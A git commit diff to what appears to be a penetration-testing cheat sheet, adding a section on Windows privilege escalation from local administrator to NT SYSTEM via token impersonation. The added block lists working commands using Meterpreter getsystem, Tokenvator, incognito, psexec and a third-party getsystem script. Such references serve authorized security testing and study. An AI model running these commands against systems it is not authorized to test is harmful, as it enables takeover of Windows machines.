SSRF SVG + Windows Token getsystem
This commit is contained in:
@@ -18,6 +18,7 @@
|
||||
* [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system)
|
||||
* [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts)
|
||||
* [EoP - Impersonation Privileges](#eop---impersonation-privileges)
|
||||
* [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
|
||||
* [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
|
||||
* [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
|
||||
* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure)
|
||||
@@ -662,6 +663,16 @@ Microsoft.Workflow.Compiler.exe tests.xml results.xml
|
||||
|
||||
## EoP - Impersonation Privileges
|
||||
|
||||
### Meterpreter getsystem and alternatives
|
||||
|
||||
```powershell
|
||||
meterpreter> getsystem
|
||||
Tokenvator.exe getsystem cmd.exe
|
||||
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe
|
||||
psexec -s -i cmd.exe
|
||||
python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc
|
||||
```
|
||||
|
||||
### RottenPotato (Token Impersonation)
|
||||
|
||||
Binary available at : https://github.com/foxglovesec/RottenPotato
|
||||
|
||||
Reference in New Issue
Block a user